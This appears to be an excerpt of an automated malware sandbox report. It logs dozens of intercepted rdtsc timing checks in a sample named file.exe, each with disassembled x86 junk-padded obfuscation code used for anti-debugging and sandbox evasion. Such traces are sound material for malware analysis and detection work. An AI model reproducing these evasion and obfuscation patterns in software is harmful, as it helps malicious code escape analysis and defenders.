                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4336 second address: 6E433A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E433A second address: 6E434E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7E2CC83CA2h 0x0000000c jnc 00007F7E2CC83C96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3E99 second address: 6E3EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7E2CD3B836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4009 second address: 6E400D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E400D second address: 6E4029 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7E2CD3B83Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6A5C second address: 6E6A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6A62 second address: 6E6A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 je 00007F7E2CD3B836h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6A71 second address: 6E6A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9654 second address: 6E9667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9667 second address: 6E967A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CC83C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECF79 second address: 6ECF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED0C6 second address: 6ED0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED0CA second address: 6ED119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7E2CD3B83Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7E2CD3B848h 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jc 00007F7E2CD3B836h 0x0000001b jng 00007F7E2CD3B836h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CD3B841h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED119 second address: 6ED11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED24C second address: 6ED289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7E2CD3B843h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 popad 0x00000013 jl 00007F7E2CD3B852h 0x00000019 jng 00007F7E2CD3B83Eh 0x0000001f pushad 0x00000020 popad 0x00000021 jg 00007F7E2CD3B836h 0x00000027 push eax 0x00000028 push edx 0x00000029 js 00007F7E2CD3B836h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED6BE second address: 6ED6C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDC7F second address: 6EDCB7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CD3B84Eh 0x00000008 jmp 00007F7E2CD3B846h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F7E2CD3B83Bh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007F7E2CD3B836h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCB7 second address: 6EDCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCBD second address: 6EDCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E2CD3B83Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCCF second address: 6EDCD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCD5 second address: 6EDCDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F272D second address: 6F278A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb dx, 10C8h 0x0000000d push 00000004h 0x0000000f mov dx, BE48h 0x00000013 call 00007F7E2CC83C99h 0x00000018 jno 00007F7E2CC83CA0h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CC83CA5h 0x00000025 pop edx 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a jmp 00007F7E2CC83C9Dh 0x0000002f mov eax, dword ptr [eax] 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 pushad 0x00000035 popad 0x00000036 pop edi 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A64 second address: 6F2A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A6A second address: 6F2A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A6E second address: 6F2A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A72 second address: 6F2A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CC83C9Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A88 second address: 6F2A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A9D second address: 6F2AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3F9A second address: 6F3FB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7E2CD3B844h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F60B0 second address: 6F60B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C24 second address: 49F1C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C2A second address: 49F1C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C2E second address: 49F1C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b pushad 0x0000000c mov cx, 175Bh 0x00000010 popad 0x00000011 call dword ptr [7598188Ch] 0x00000017 mov edi, edi 0x00000019 push ebp 0x0000001a mov ebp, esp 0x0000001c push ecx 0x0000001d mov ecx, dword ptr [7FFE0004h] 0x00000023 mov dword ptr [ebp-04h], ecx 0x00000026 cmp ecx, 01000000h 0x0000002c jc 00007F7E2CD6D315h 0x00000032 mov eax, 7FFE0320h 0x00000037 mov eax, dword ptr [eax] 0x00000039 mul ecx 0x0000003b shrd eax, edx, 00000018h 0x0000003f mov esp, ebp 0x00000041 pop ebp 0x00000042 ret 0x00000043 jmp 00007F7E2CD3B83Dh 0x00000048 pop ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C59 second address: 49F1C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C5D second address: 49F1C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C61 second address: 49F1C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C67 second address: 49F1AE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B842h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b xor esi, eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 call 00007F7E31323B90h 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1AE0 second address: 49F1AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1AFD second address: 49F1BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B841h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7E2CD3B83Ch 0x00000011 and eax, 47EB2358h 0x00000017 jmp 00007F7E2CD3B83Bh 0x0000001c popfd 0x0000001d mov eax, 7CF1400Fh 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 mov si, di 0x00000028 pushad 0x00000029 mov si, di 0x0000002c pushfd 0x0000002d jmp 00007F7E2CD3B849h 0x00000032 or esi, 19C899A6h 0x00000038 jmp 00007F7E2CD3B841h 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 xchg eax, ebp 0x00000041 pushad 0x00000042 mov esi, 1904B373h 0x00000047 pushfd 0x00000048 jmp 00007F7E2CD3B848h 0x0000004d sub ecx, 51315278h 0x00000053 jmp 00007F7E2CD3B83Bh 0x00000058 popfd 0x00000059 popad 0x0000005a mov ebp, esp 0x0000005c pushad 0x0000005d movzx ecx, dx 0x00000060 popad 0x00000061 pop ebp 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BB7 second address: 49F1BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BBB second address: 49F1BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BC1 second address: 49F1BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83C9Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1969 second address: 49F196D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F196D second address: 49F1973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990798 second address: 49907BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 84h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CD3B849h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49907BC second address: 49907C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49907C2 second address: 49907C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06D9 second address: 49C06F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06F9 second address: 49C06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06FD second address: 49C0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0701 second address: 49C0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0707 second address: 49C070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C070D second address: 49C075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7E2CD3B848h 0x0000000f push dword ptr [ebp+04h] 0x00000012 pushad 0x00000013 push eax 0x00000014 mov ebx, 59381510h 0x00000019 pop ebx 0x0000001a mov cx, 1BC5h 0x0000001e popad 0x0000001f push dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CD3B847h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C075B second address: 49C0761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0761 second address: 49C0765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0765 second address: 49C0790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CC83CA5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A062A second address: 49A0646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B841h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0646 second address: 49A0659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0659 second address: 49A065E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A065E second address: 49A0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1755 second address: 49F1759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1759 second address: 49F175D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F175D second address: 49F1763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1763 second address: 49F1778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1778 second address: 49F177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F177C second address: 49F17C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F7E2CC83CA3h 0x00000010 jmp 00007F7E2CC83CA8h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7E2CC83C9Ah 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F17C2 second address: 49F17D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F17D1 second address: 4990798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp dword ptr [7598155Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 mov ecx, dword ptr fs:[00000018h] 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e mov dword ptr [ecx+34h], 00000000h 0x00000025 cmp eax, 40h 0x00000028 jnc 00007F7E2CC83C9Dh 0x0000002a mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000031 pop ebp 0x00000032 retn 0004h 0x00000035 test eax, eax 0x00000037 je 00007F7E2CC83CB3h 0x00000039 mov eax, dword ptr [00459710h] 0x0000003e cmp eax, FFFFFFFFh 0x00000041 je 00007F7E2CC83CA9h 0x00000043 mov esi, 00401BB4h 0x00000048 push esi 0x00000049 call 00007F7E3120B290h 0x0000004e mov edi, edi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov edx, 4E901C16h 0x00000058 push edi 0x00000059 pop eax 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498078A second address: 498078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498078E second address: 4980792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980792 second address: 4980798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0059 second address: 49F00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007F7E2CC83C9Ah 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e jmp 00007F7E2CC83C9Eh 0x00000013 call 00007F7E2CC83CA2h 0x00000018 mov ebx, ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov eax, dword ptr fs:[00000030h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 call 00007F7E2CC83CA4h 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00B1 second address: 49F00D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 74BDh 0x00000007 mov ah, 9Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub esp, 18h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7E2CD3B840h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00D2 second address: 49F00E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00E8 second address: 49F00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov edi, 38053E28h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov eax, edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00FA second address: 49F013D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F7E2CC83C9Fh 0x0000000d mov ebx, dword ptr [eax+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F7E2CC83C9Bh 0x00000018 pop eax 0x00000019 jmp 00007F7E2CC83CA9h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F013D second address: 49F016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov dx, 057Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov si, 56D7h 0x00000013 mov esi, 63278973h 0x00000018 popad 0x00000019 mov dword ptr [esp], esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CD3B840h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F016D second address: 49F0173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0173 second address: 49F01A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [759B06ECh] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 call 00007F7E2CD3B843h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01A5 second address: 49F021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F7E2CC83CA0h 0x00000010 jne 00007F7E2CC84C0Ah 0x00000016 jmp 00007F7E2CC83CA0h 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d pushad 0x0000001e push esi 0x0000001f pop edi 0x00000020 mov dx, si 0x00000023 popad 0x00000024 call 00007F7E2CC83CA4h 0x00000029 movzx esi, dx 0x0000002c pop edx 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F7E2CC83C9Dh 0x00000034 xchg eax, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F021C second address: 49F027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CD3B841h 0x00000009 sbb ax, 9946h 0x0000000e jmp 00007F7E2CD3B841h 0x00000013 popfd 0x00000014 mov ah, 7Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 call dword ptr [75980B60h] 0x0000001f mov eax, 75F3E5E0h 0x00000024 ret 0x00000025 jmp 00007F7E2CD3B843h 0x0000002a push 00000044h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F7E2CD3B845h 0x00000033 rdtsc
